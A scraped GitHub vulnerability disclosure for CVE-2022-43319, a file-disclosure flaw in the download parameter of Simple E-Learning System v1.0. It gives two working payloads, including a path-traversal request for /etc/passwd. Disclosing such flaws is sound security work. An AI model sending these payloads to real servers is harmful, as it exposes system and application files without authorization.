Headline
CVE-2022-43319: bug_report/discl1.md at main · ImaizumiYui/bug_report
An information disclosure vulnerability in the component vcs/downloadFiles.php?download=./search.php of Simple E-Learning System v1.0 allows attackers to read arbitrary files.
Permalink
1 contributor
Users who have contributed to this file
Simple E-Learning System v1.0 by oretnom23 has file disclosure
vendor:https://www.sourcecodester.com/php-simple-e-learning-system-source-code
Vulnerability File: vcs/downloadFiles.php?download=
Vulnerability location: vcs/downloadFiles.php?download=, download
Payload1: vcs/downloadFiles.php?download=…/…/…/…/…/…/…/…/…/etc/passwd
Payload2: vcs/downloadFiles.php?download=./search.php